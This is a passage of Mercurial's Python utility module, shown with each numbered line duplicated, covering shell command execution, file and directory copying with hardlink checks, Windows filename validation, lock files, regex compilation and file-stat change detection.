1179 else:
1179 else:
1180 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1180 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1181 env=env, cwd=cwd, stdout=subprocess.PIPE,
1181 env=env, cwd=cwd, stdout=subprocess.PIPE,
1182 stderr=subprocess.STDOUT)
1182 stderr=subprocess.STDOUT)
1183 for line in iter(proc.stdout.readline, ''):
1183 for line in iter(proc.stdout.readline, ''):
1184 out.write(line)
1184 out.write(line)
1185 proc.wait()
1185 proc.wait()
1186 rc = proc.returncode
1186 rc = proc.returncode
1187 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1187 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1188 rc = 0
1188 rc = 0
1189 return rc
1189 return rc
1190
1190
1191 def checksignature(func):
1191 def checksignature(func):
1192 '''wrap a function with code to check for calling errors'''
1192 '''wrap a function with code to check for calling errors'''
1193 def check(*args, **kwargs):
1193 def check(*args, **kwargs):
1194 try:
1194 try:
1195 return func(*args, **kwargs)
1195 return func(*args, **kwargs)
1196 except TypeError:
1196 except TypeError:
1197 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1197 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1198 raise error.SignatureError
1198 raise error.SignatureError
1199 raise
1199 raise
1200
1200
1201 return check
1201 return check
1202
1202
1203 # a whilelist of known filesystems where hardlink works reliably
1203 # a whilelist of known filesystems where hardlink works reliably
1204 _hardlinkfswhitelist = {
1204 _hardlinkfswhitelist = {
1205 'btrfs',
1205 'btrfs',
1206 'ext2',
1206 'ext2',
1207 'ext3',
1207 'ext3',
1208 'ext4',
1208 'ext4',
1209 'hfs',
1209 'hfs',
1210 'jfs',
1210 'jfs',
1211 'NTFS',
1211 'NTFS',
1212 'reiserfs',
1212 'reiserfs',
1213 'tmpfs',
1213 'tmpfs',
1214 'ufs',
1214 'ufs',
1215 'xfs',
1215 'xfs',
1216 'zfs',
1216 'zfs',
1217 }
1217 }
1218
1218
1219 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1219 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1220 '''copy a file, preserving mode and optionally other stat info like
1220 '''copy a file, preserving mode and optionally other stat info like
1221 atime/mtime
1221 atime/mtime
1222
1222
1223 checkambig argument is used with filestat, and is useful only if
1223 checkambig argument is used with filestat, and is useful only if
1224 destination file is guarded by any lock (e.g. repo.lock or
1224 destination file is guarded by any lock (e.g. repo.lock or
1225 repo.wlock).
1225 repo.wlock).
1226
1226
1227 copystat and checkambig should be exclusive.
1227 copystat and checkambig should be exclusive.
1228 '''
1228 '''
1229 assert not (copystat and checkambig)
1229 assert not (copystat and checkambig)
1230 oldstat = None
1230 oldstat = None
1231 if os.path.lexists(dest):
1231 if os.path.lexists(dest):
1232 if checkambig:
1232 if checkambig:
1233 oldstat = checkambig and filestat.frompath(dest)
1233 oldstat = checkambig and filestat.frompath(dest)
1234 unlink(dest)
1234 unlink(dest)
1235 if hardlink:
1235 if hardlink:
1236 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1236 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1237 # unless we are confident that dest is on a whitelisted filesystem.
1237 # unless we are confident that dest is on a whitelisted filesystem.
1238 try:
1238 try:
1239 fstype = getfstype(os.path.dirname(dest))
1239 fstype = getfstype(os.path.dirname(dest))
1240 except OSError:
1240 except OSError:
1241 fstype = None
1241 fstype = None
1242 if fstype not in _hardlinkfswhitelist:
1242 if fstype not in _hardlinkfswhitelist:
1243 hardlink = False
1243 hardlink = False
1244 if hardlink:
1244 if hardlink:
1245 try:
1245 try:
1246 oslink(src, dest)
1246 oslink(src, dest)
1247 return
1247 return
1248 except (IOError, OSError):
1248 except (IOError, OSError):
1249 pass # fall back to normal copy
1249 pass # fall back to normal copy
1250 if os.path.islink(src):
1250 if os.path.islink(src):
1251 os.symlink(os.readlink(src), dest)
1251 os.symlink(os.readlink(src), dest)
1252 # copytime is ignored for symlinks, but in general copytime isn't needed
1252 # copytime is ignored for symlinks, but in general copytime isn't needed
1253 # for them anyway
1253 # for them anyway
1254 else:
1254 else:
1255 try:
1255 try:
1256 shutil.copyfile(src, dest)
1256 shutil.copyfile(src, dest)
1257 if copystat:
1257 if copystat:
1258 # copystat also copies mode
1258 # copystat also copies mode
1259 shutil.copystat(src, dest)
1259 shutil.copystat(src, dest)
1260 else:
1260 else:
1261 shutil.copymode(src, dest)
1261 shutil.copymode(src, dest)
1262 if oldstat and oldstat.stat:
1262 if oldstat and oldstat.stat:
1263 newstat = filestat.frompath(dest)
1263 newstat = filestat.frompath(dest)
1264 if newstat.isambig(oldstat):
1264 if newstat.isambig(oldstat):
1265 # stat of copied file is ambiguous to original one
1265 # stat of copied file is ambiguous to original one
1266 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1266 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1267 os.utime(dest, (advanced, advanced))
1267 os.utime(dest, (advanced, advanced))
1268 except shutil.Error as inst:
1268 except shutil.Error as inst:
1269 raise Abort(str(inst))
1269 raise Abort(str(inst))
1270
1270
1271 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1271 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1272 """Copy a directory tree using hardlinks if possible."""
1272 """Copy a directory tree using hardlinks if possible."""
1273 num = 0
1273 num = 0
1274
1274
1275 gettopic = lambda: hardlink and _('linking') or _('copying')
1275 gettopic = lambda: hardlink and _('linking') or _('copying')
1276
1276
1277 if os.path.isdir(src):
1277 if os.path.isdir(src):
1278 if hardlink is None:
1278 if hardlink is None:
1279 hardlink = (os.stat(src).st_dev ==
1279 hardlink = (os.stat(src).st_dev ==
1280 os.stat(os.path.dirname(dst)).st_dev)
1280 os.stat(os.path.dirname(dst)).st_dev)
1281 topic = gettopic()
1281 topic = gettopic()
1282 os.mkdir(dst)
1282 os.mkdir(dst)
1283 for name, kind in listdir(src):
1283 for name, kind in listdir(src):
1284 srcname = os.path.join(src, name)
1284 srcname = os.path.join(src, name)
1285 dstname = os.path.join(dst, name)
1285 dstname = os.path.join(dst, name)
1286 def nprog(t, pos):
1286 def nprog(t, pos):
1287 if pos is not None:
1287 if pos is not None:
1288 return progress(t, pos + num)
1288 return progress(t, pos + num)
1289 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1289 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1290 num += n
1290 num += n
1291 else:
1291 else:
1292 if hardlink is None:
1292 if hardlink is None:
1293 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1293 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1294 os.stat(os.path.dirname(dst)).st_dev)
1294 os.stat(os.path.dirname(dst)).st_dev)
1295 topic = gettopic()
1295 topic = gettopic()
1296
1296
1297 if hardlink:
1297 if hardlink:
1298 try:
1298 try:
1299 oslink(src, dst)
1299 oslink(src, dst)
1300 except (IOError, OSError):
1300 except (IOError, OSError):
1301 hardlink = False
1301 hardlink = False
1302 shutil.copy(src, dst)
1302 shutil.copy(src, dst)
1303 else:
1303 else:
1304 shutil.copy(src, dst)
1304 shutil.copy(src, dst)
1305 num += 1
1305 num += 1
1306 progress(topic, num)
1306 progress(topic, num)
1307 progress(topic, None)
1307 progress(topic, None)
1308
1308
1309 return hardlink, num
1309 return hardlink, num
1310
1310
1311 _winreservednames = {
1311 _winreservednames = {
1312 'con', 'prn', 'aux', 'nul',
1312 'con', 'prn', 'aux', 'nul',
1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1315 }
1315 }
1316 _winreservedchars = ':*?"<>|'
1316 _winreservedchars = ':*?"<>|'
1317 def checkwinfilename(path):
1317 def checkwinfilename(path):
1318 r'''Check that the base-relative path is a valid filename on Windows.
1318 r'''Check that the base-relative path is a valid filename on Windows.
1319 Returns None if the path is ok, or a UI string describing the problem.
1319 Returns None if the path is ok, or a UI string describing the problem.
1320
1320
1321 >>> checkwinfilename(b"just/a/normal/path")
1321 >>> checkwinfilename(b"just/a/normal/path")
1322 >>> checkwinfilename(b"foo/bar/con.xml")
1322 >>> checkwinfilename(b"foo/bar/con.xml")
1323 "filename contains 'con', which is reserved on Windows"
1323 "filename contains 'con', which is reserved on Windows"
1324 >>> checkwinfilename(b"foo/con.xml/bar")
1324 >>> checkwinfilename(b"foo/con.xml/bar")
1325 "filename contains 'con', which is reserved on Windows"
1325 "filename contains 'con', which is reserved on Windows"
1326 >>> checkwinfilename(b"foo/bar/xml.con")
1326 >>> checkwinfilename(b"foo/bar/xml.con")
1327 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1327 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1328 "filename contains 'AUX', which is reserved on Windows"
1328 "filename contains 'AUX', which is reserved on Windows"
1329 >>> checkwinfilename(b"foo/bar/bla:.txt")
1329 >>> checkwinfilename(b"foo/bar/bla:.txt")
1330 "filename contains ':', which is reserved on Windows"
1330 "filename contains ':', which is reserved on Windows"
1331 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1331 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1332 "filename contains '\\x07', which is invalid on Windows"
1332 "filename contains '\\x07', which is invalid on Windows"
1333 >>> checkwinfilename(b"foo/bar/bla ")
1333 >>> checkwinfilename(b"foo/bar/bla ")
1334 "filename ends with ' ', which is not allowed on Windows"
1334 "filename ends with ' ', which is not allowed on Windows"
1335 >>> checkwinfilename(b"../bar")
1335 >>> checkwinfilename(b"../bar")
1336 >>> checkwinfilename(b"foo\\")
1336 >>> checkwinfilename(b"foo\\")
1337 "filename ends with '\\', which is invalid on Windows"
1337 "filename ends with '\\', which is invalid on Windows"
1338 >>> checkwinfilename(b"foo\\/bar")
1338 >>> checkwinfilename(b"foo\\/bar")
1339 "directory name ends with '\\', which is invalid on Windows"
1339 "directory name ends with '\\', which is invalid on Windows"
1340 '''
1340 '''
1341 if path.endswith('\\'):
1341 if path.endswith('\\'):
1342 return _("filename ends with '\\', which is invalid on Windows")
1342 return _("filename ends with '\\', which is invalid on Windows")
1343 if '\\/' in path:
1343 if '\\/' in path:
1344 return _("directory name ends with '\\', which is invalid on Windows")
1344 return _("directory name ends with '\\', which is invalid on Windows")
1345 for n in path.replace('\\', '/').split('/'):
1345 for n in path.replace('\\', '/').split('/'):
1346 if not n:
1346 if not n:
1347 continue
1347 continue
1348 for c in _filenamebytestr(n):
1348 for c in _filenamebytestr(n):
1349 if c in _winreservedchars:
1349 if c in _winreservedchars:
1350 return _("filename contains '%s', which is reserved "
1350 return _("filename contains '%s', which is reserved "
1351 "on Windows") % c
1351 "on Windows") % c
1352 if ord(c) <= 31:
1352 if ord(c) <= 31:
1353 return _("filename contains '%s', which is invalid "
1353 return _("filename contains '%s', which is invalid "
1354 "on Windows") % escapestr(c)
1354 "on Windows") % escapestr(c)
1355 base = n.split('.')[0]
1355 base = n.split('.')[0]
1356 if base and base.lower() in _winreservednames:
1356 if base and base.lower() in _winreservednames:
1357 return _("filename contains '%s', which is reserved "
1357 return _("filename contains '%s', which is reserved "
1358 "on Windows") % base
1358 "on Windows") % base
1359 t = n[-1:]
1359 t = n[-1:]
1360 if t in '. ' and n not in '..':
1360 if t in '. ' and n not in '..':
1361 return _("filename ends with '%s', which is not allowed "
1361 return _("filename ends with '%s', which is not allowed "
1362 "on Windows") % t
1362 "on Windows") % t
1363
1363
1364 if pycompat.iswindows:
1364 if pycompat.iswindows:
1365 checkosfilename = checkwinfilename
1365 checkosfilename = checkwinfilename
1366 timer = time.clock
1366 timer = time.clock
1367 else:
1367 else:
1368 checkosfilename = platform.checkosfilename
1368 checkosfilename = platform.checkosfilename
1369 timer = time.time
1369 timer = time.time
1370
1370
1371 if safehasattr(time, "perf_counter"):
1371 if safehasattr(time, "perf_counter"):
1372 timer = time.perf_counter
1372 timer = time.perf_counter
1373
1373
1374 def makelock(info, pathname):
1374 def makelock(info, pathname):
1375 try:
1375 try:
1376 return os.symlink(info, pathname)
1376 return os.symlink(info, pathname)
1377 except OSError as why:
1377 except OSError as why:
1378 if why.errno == errno.EEXIST:
1378 if why.errno == errno.EEXIST:
1379 raise
1379 raise
1380 except AttributeError: # no symlink in os
1380 except AttributeError: # no symlink in os
1381 pass
1381 pass
1382
1382
1383 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1383 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1384 os.write(ld, info)
1384 os.write(ld, info)
1385 os.close(ld)
1385 os.close(ld)
1386
1386
1387 def readlock(pathname):
1387 def readlock(pathname):
1388 try:
1388 try:
1389 return os.readlink(pathname)
1389 return os.readlink(pathname)
1390 except OSError as why:
1390 except OSError as why:
1391 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1391 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1392 raise
1392 raise
1393 except AttributeError: # no symlink in os
1393 except AttributeError: # no symlink in os
1394 pass
1394 pass
1395 fp = posixfile(pathname)
1395 fp = posixfile(pathname)
1396 r = fp.read()
1396 r = fp.read()
1397 fp.close()
1397 fp.close()
1398 return r
1398 return r
1399
1399
1400 def fstat(fp):
1400 def fstat(fp):
1401 '''stat file object that may not have fileno method.'''
1401 '''stat file object that may not have fileno method.'''
1402 try:
1402 try:
1403 return os.fstat(fp.fileno())
1403 return os.fstat(fp.fileno())
1404 except AttributeError:
1404 except AttributeError:
1405 return os.stat(fp.name)
1405 return os.stat(fp.name)
1406
1406
1407 # File system features
1407 # File system features
1408
1408
1409 def fscasesensitive(path):
1409 def fscasesensitive(path):
1410 """
1410 """
1411 Return true if the given path is on a case-sensitive filesystem
1411 Return true if the given path is on a case-sensitive filesystem
1412
1412
1413 Requires a path (like /foo/.hg) ending with a foldable final
1413 Requires a path (like /foo/.hg) ending with a foldable final
1414 directory component.
1414 directory component.
1415 """
1415 """
1416 s1 = os.lstat(path)
1416 s1 = os.lstat(path)
1417 d, b = os.path.split(path)
1417 d, b = os.path.split(path)
1418 b2 = b.upper()
1418 b2 = b.upper()
1419 if b == b2:
1419 if b == b2:
1420 b2 = b.lower()
1420 b2 = b.lower()
1421 if b == b2:
1421 if b == b2:
1422 return True # no evidence against case sensitivity
1422 return True # no evidence against case sensitivity
1423 p2 = os.path.join(d, b2)
1423 p2 = os.path.join(d, b2)
1424 try:
1424 try:
1425 s2 = os.lstat(p2)
1425 s2 = os.lstat(p2)
1426 if s2 == s1:
1426 if s2 == s1:
1427 return False
1427 return False
1428 return True
1428 return True
1429 except OSError:
1429 except OSError:
1430 return True
1430 return True
1431
1431
1432 try:
1432 try:
1433 import re2
1433 import re2
1434 _re2 = None
1434 _re2 = None
1435 except ImportError:
1435 except ImportError:
1436 _re2 = False
1436 _re2 = False
1437
1437
1438 class _re(object):
1438 class _re(object):
1439 def _checkre2(self):
1439 def _checkre2(self):
1440 global _re2
1440 global _re2
1441 try:
1441 try:
1442 # check if match works, see issue3964
1442 # check if match works, see issue3964
1443 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1443 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1444 except ImportError:
1444 except ImportError:
1445 _re2 = False
1445 _re2 = False
1446
1446
1447 def compile(self, pat, flags=0):
1447 def compile(self, pat, flags=0):
1448 '''Compile a regular expression, using re2 if possible
1448 '''Compile a regular expression, using re2 if possible
1449
1449
1450 For best performance, use only re2-compatible regexp features. The
1450 For best performance, use only re2-compatible regexp features. The
1451 only flags from the re module that are re2-compatible are
1451 only flags from the re module that are re2-compatible are
1452 IGNORECASE and MULTILINE.'''
1452 IGNORECASE and MULTILINE.'''
1453 if _re2 is None:
1453 if _re2 is None:
1454 self._checkre2()
1454 self._checkre2()
1455 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1455 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1456 if flags & remod.IGNORECASE:
1456 if flags & remod.IGNORECASE:
1457 pat = '(?i)' + pat
1457 pat = '(?i)' + pat
1458 if flags & remod.MULTILINE:
1458 if flags & remod.MULTILINE:
1459 pat = '(?m)' + pat
1459 pat = '(?m)' + pat
1460 try:
1460 try:
1461 return re2.compile(pat)
1461 return re2.compile(pat)
1462 except re2.error:
1462 except re2.error:
1463 pass
1463 pass
1464 return remod.compile(pat, flags)
1464 return remod.compile(pat, flags)
1465
1465
1466 @propertycache
1466 @propertycache
1467 def escape(self):
1467 def escape(self):
1468 '''Return the version of escape corresponding to self.compile.
1468 '''Return the version of escape corresponding to self.compile.
1469
1469
1470 This is imperfect because whether re2 or re is used for a particular
1470 This is imperfect because whether re2 or re is used for a particular
1471 function depends on the flags, etc, but it's the best we can do.
1471 function depends on the flags, etc, but it's the best we can do.
1472 '''
1472 '''
1473 global _re2
1473 global _re2
1474 if _re2 is None:
1474 if _re2 is None:
1475 self._checkre2()
1475 self._checkre2()
1476 if _re2:
1476 if _re2:
1477 return re2.escape
1477 return re2.escape
1478 else:
1478 else:
1479 return remod.escape
1479 return remod.escape
1480
1480
1481 re = _re()
1481 re = _re()
1482
1482
1483 _fspathcache = {}
1483 _fspathcache = {}
1484 def fspath(name, root):
1484 def fspath(name, root):
1485 '''Get name in the case stored in the filesystem
1485 '''Get name in the case stored in the filesystem
1486
1486
1487 The name should be relative to root, and be normcase-ed for efficiency.
1487 The name should be relative to root, and be normcase-ed for efficiency.
1488
1488
1489 Note that this function is unnecessary, and should not be
1489 Note that this function is unnecessary, and should not be
1490 called, for case-sensitive filesystems (simply because it's expensive).
1490 called, for case-sensitive filesystems (simply because it's expensive).
1491
1491
1492 The root should be normcase-ed, too.
1492 The root should be normcase-ed, too.
1493 '''
1493 '''
1494 def _makefspathcacheentry(dir):
1494 def _makefspathcacheentry(dir):
1495 return dict((normcase(n), n) for n in os.listdir(dir))
1495 return dict((normcase(n), n) for n in os.listdir(dir))
1496
1496
1497 seps = pycompat.ossep
1497 seps = pycompat.ossep
1498 if pycompat.osaltsep:
1498 if pycompat.osaltsep:
1499 seps = seps + pycompat.osaltsep
1499 seps = seps + pycompat.osaltsep
1500 # Protect backslashes. This gets silly very quickly.
1500 # Protect backslashes. This gets silly very quickly.
1501 seps.replace('\\','\\\\')
1501 seps.replace('\\','\\\\')
1502 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1502 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1503 dir = os.path.normpath(root)
1503 dir = os.path.normpath(root)
1504 result = []
1504 result = []
1505 for part, sep in pattern.findall(name):
1505 for part, sep in pattern.findall(name):
1506 if sep:
1506 if sep:
1507 result.append(sep)
1507 result.append(sep)
1508 continue
1508 continue
1509
1509
1510 if dir not in _fspathcache:
1510 if dir not in _fspathcache:
1511 _fspathcache[dir] = _makefspathcacheentry(dir)
1511 _fspathcache[dir] = _makefspathcacheentry(dir)
1512 contents = _fspathcache[dir]
1512 contents = _fspathcache[dir]
1513
1513
1514 found = contents.get(part)
1514 found = contents.get(part)
1515 if not found:
1515 if not found:
1516 # retry "once per directory" per "dirstate.walk" which
1516 # retry "once per directory" per "dirstate.walk" which
1517 # may take place for each patches of "hg qpush", for example
1517 # may take place for each patches of "hg qpush", for example
1518 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1518 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1519 found = contents.get(part)
1519 found = contents.get(part)
1520
1520
1521 result.append(found or part)
1521 result.append(found or part)
1522 dir = os.path.join(dir, part)
1522 dir = os.path.join(dir, part)
1523
1523
1524 return ''.join(result)
1524 return ''.join(result)
1525
1525
1526 def checknlink(testfile):
1526 def checknlink(testfile):
1527 '''check whether hardlink count reporting works properly'''
1527 '''check whether hardlink count reporting works properly'''
1528
1528
1529 # testfile may be open, so we need a separate file for checking to
1529 # testfile may be open, so we need a separate file for checking to
1530 # work around issue2543 (or testfile may get lost on Samba shares)
1530 # work around issue2543 (or testfile may get lost on Samba shares)
1531 f1, f2, fp = None, None, None
1531 f1, f2, fp = None, None, None
1532 try:
1532 try:
1533 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1533 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1534 suffix='1~', dir=os.path.dirname(testfile))
1534 suffix='1~', dir=os.path.dirname(testfile))
1535 os.close(fd)
1535 os.close(fd)
1536 f2 = '%s2~' % f1[:-2]
1536 f2 = '%s2~' % f1[:-2]
1537
1537
1538 oslink(f1, f2)
1538 oslink(f1, f2)
1539 # nlinks() may behave differently for files on Windows shares if
1539 # nlinks() may behave differently for files on Windows shares if
1540 # the file is open.
1540 # the file is open.
1541 fp = posixfile(f2)
1541 fp = posixfile(f2)
1542 return nlinks(f2) > 1
1542 return nlinks(f2) > 1
1543 except OSError:
1543 except OSError:
1544 return False
1544 return False
1545 finally:
1545 finally:
1546 if fp is not None:
1546 if fp is not None:
1547 fp.close()
1547 fp.close()
1548 for f in (f1, f2):
1548 for f in (f1, f2):
1549 try:
1549 try:
1550 if f is not None:
1550 if f is not None:
1551 os.unlink(f)
1551 os.unlink(f)
1552 except OSError:
1552 except OSError:
1553 pass
1553 pass
1554
1554
1555 def endswithsep(path):
1555 def endswithsep(path):
1556 '''Check path ends with os.sep or os.altsep.'''
1556 '''Check path ends with os.sep or os.altsep.'''
1557 return (path.endswith(pycompat.ossep)
1557 return (path.endswith(pycompat.ossep)
1558 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1558 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1559
1559
1560 def splitpath(path):
1560 def splitpath(path):
1561 '''Split path by os.sep.
1561 '''Split path by os.sep.
1562 Note that this function does not use os.altsep because this is
1562 Note that this function does not use os.altsep because this is
1563 an alternative of simple "xxx.split(os.sep)".
1563 an alternative of simple "xxx.split(os.sep)".
1564 It is recommended to use os.path.normpath() before using this
1564 It is recommended to use os.path.normpath() before using this
1565 function if need.'''
1565 function if need.'''
1566 return path.split(pycompat.ossep)
1566 return path.split(pycompat.ossep)
1567
1567
1568 def gui():
1568 def gui():
1569 '''Are we running in a GUI?'''
1569 '''Are we running in a GUI?'''
1570 if pycompat.isdarwin:
1570 if pycompat.isdarwin:
1571 if 'SSH_CONNECTION' in encoding.environ:
1571 if 'SSH_CONNECTION' in encoding.environ:
1572 # handle SSH access to a box where the user is logged in
1572 # handle SSH access to a box where the user is logged in
1573 return False
1573 return False
1574 elif getattr(osutil, 'isgui', None):
1574 elif getattr(osutil, 'isgui', None):
1575 # check if a CoreGraphics session is available
1575 # check if a CoreGraphics session is available
1576 return osutil.isgui()
1576 return osutil.isgui()
1577 else:
1577 else:
1578 # pure build; use a safe default
1578 # pure build; use a safe default
1579 return True
1579 return True
1580 else:
1580 else:
1581 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1581 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1582
1582
1583 def mktempcopy(name, emptyok=False, createmode=None):
1583 def mktempcopy(name, emptyok=False, createmode=None):
1584 """Create a temporary file with the same contents from name
1584 """Create a temporary file with the same contents from name
1585
1585
1586 The permission bits are copied from the original file.
1586 The permission bits are copied from the original file.
1587
1587
1588 If the temporary file is going to be truncated immediately, you
1588 If the temporary file is going to be truncated immediately, you
1589 can use emptyok=True as an optimization.
1589 can use emptyok=True as an optimization.
1590
1590
1591 Returns the name of the temporary file.
1591 Returns the name of the temporary file.
1592 """
1592 """
1593 d, fn = os.path.split(name)
1593 d, fn = os.path.split(name)
1594 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1594 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1595 os.close(fd)
1595 os.close(fd)
1596 # Temporary files are created with mode 0600, which is usually not
1596 # Temporary files are created with mode 0600, which is usually not
1597 # what we want. If the original file already exists, just copy
1597 # what we want. If the original file already exists, just copy
1598 # its mode. Otherwise, manually obey umask.
1598 # its mode. Otherwise, manually obey umask.
1599 copymode(name, temp, createmode)
1599 copymode(name, temp, createmode)
1600 if emptyok:
1600 if emptyok:
1601 return temp
1601 return temp
1602 try:
1602 try:
1603 try:
1603 try:
1604 ifp = posixfile(name, "rb")
1604 ifp = posixfile(name, "rb")
1605 except IOError as inst:
1605 except IOError as inst:
1606 if inst.errno == errno.ENOENT:
1606 if inst.errno == errno.ENOENT:
1607 return temp
1607 return temp
1608 if not getattr(inst, 'filename', None):
1608 if not getattr(inst, 'filename', None):
1609 inst.filename = name
1609 inst.filename = name
1610 raise
1610 raise
1611 ofp = posixfile(temp, "wb")
1611 ofp = posixfile(temp, "wb")
1612 for chunk in filechunkiter(ifp):
1612 for chunk in filechunkiter(ifp):
1613 ofp.write(chunk)
1613 ofp.write(chunk)
1614 ifp.close()
1614 ifp.close()
1615 ofp.close()
1615 ofp.close()
1616 except: # re-raises
1616 except: # re-raises
1617 try:
1617 try:
1618 os.unlink(temp)
1618 os.unlink(temp)
1619 except OSError:
1619 except OSError:
1620 pass
1620 pass
1621 raise
1621 raise
1622 return temp
1622 return temp
1623
1623
1624 class filestat(object):
1624 class filestat(object):
1625 """help to exactly detect change of a file
1625 """help to exactly detect change of a file
1626
1626
1627 'stat' attribute is result of 'os.stat()' if specified 'path'
1627 'stat' attribute is result of 'os.stat()' if specified 'path'
1628 exists. Otherwise, it is None. This can avoid preparative
1628 exists. Otherwise, it is None. This can avoid preparative
1629 'exists()' examination on client side of this class.
1629 'exists()' examination on client side of this class.
1630 """
1630 """
1631 def __init__(self, stat):
1631 def __init__(self, stat):
1632 self.stat = stat
1632 self.stat = stat
1633
1633
1634 @classmethod
1634 @classmethod
1635 def frompath(cls, path):
1635 def frompath(cls, path):
1636 try:
1636 try:
1637 stat = os.stat(path)
1637 stat = os.stat(path)
1638 except OSError as err:
1638 except OSError as err:
1639 if err.errno != errno.ENOENT:
1639 if err.errno != errno.ENOENT:
1640 raise
1640 raise
1641 stat = None
1641 stat = None
1642 return cls(stat)
1642 return cls(stat)
1643
1643
1644 @classmethod
1644 @classmethod
1645 def fromfp(cls, fp):
1645 def fromfp(cls, fp):
1646 stat = os.fstat(fp.fileno())
1646 stat = os.fstat(fp.fileno())
1647 return cls(stat)
1647 return cls(stat)
1648
1648
1649 __hash__ = object.__hash__
1649 __hash__ = object.__hash__
1650
1650
1651 def __eq__(self, old):
1651 def __eq__(self, old):
1652 try:
1652 try:
1653 # if ambiguity between stat of new and old file is
1653 # if ambiguity between stat of new and old file is
1654 # avoided, comparison of size, ctime and mtime is enough
1654 # avoided, comparison of size, ctime and mtime is enough
1655 # to exactly detect change of a file regardless of platform
1655 # to exactly detect change of a file regardless of platform
1656 return (self.stat.st_size == old.stat.st_size and
1656 return (self.stat.st_size == old.stat.st_size and
1657 self.stat.st_ctime == old.stat.st_ctime and
1657 self.stat.st_ctime == old.stat.st_ctime and
1658 self.stat.st_mtime == old.stat.st_mtime)
1658 self.stat.st_mtime == old.stat.st_mtime)
1659 except AttributeError:
1659 except AttributeError:
1660 pass
1660 pass
1661 try:
1661 try:
1662 return self.stat is None and old.stat is None
1662 return self.stat is None and old.stat is None
1663 except AttributeError:
1663 except AttributeError:
1664 return False
1664 return False
1665
1665
1666 def isambig(self, old):
1666 def isambig(self, old):
1667 """Examine whether new (= self) stat is ambiguous against old one
1667 """Examine whether new (= self) stat is ambiguous against old one
1668
1668
1669 "S[N]" below means stat of a file at N-th change:
1669 "S[N]" below means stat of a file at N-th change:
1670
1670
1671 - S[n-1].ctime < S[n].ctime: can detect change of a file
1671 - S[n-1].ctime < S[n].ctime: can detect change of a file
1672 - S[n-1].ctime == S[n].ctime
1672 - S[n-1].ctime == S[n].ctime
1673 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1673 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1674 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1674 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1675 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1675 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1676 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1676 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1677
1677
1678 Case (*2) above means that a file was changed twice or more at
1678 Case (*2) above means that a file was changed twice or more at
1679 same time in sec (= S[n-1].ctime), and comparison of timestamp
1679 same time in sec (= S[n-1].ctime), and comparison of timestamp
1680 is ambiguous.
1680 is ambiguous.
1681
1681
1682 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1682 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1683 timestamp is ambiguous".
1683 timestamp is ambiguous".
1684
1684
1685 But advancing mtime only in case (*2) doesn't work as
1685 But advancing mtime only in case (*2) doesn't work as
1686 expected, because naturally advanced S[n].mtime in case (*1)
1686 expected, because naturally advanced S[n].mtime in case (*1)
1687 might be equal to manually advanced S[n-1 or earlier].mtime.
1687 might be equal to manually advanced S[n-1 or earlier].mtime.
1688
1688
1689 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1689 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1690 treated as ambiguous regardless of mtime, to avoid overlooking
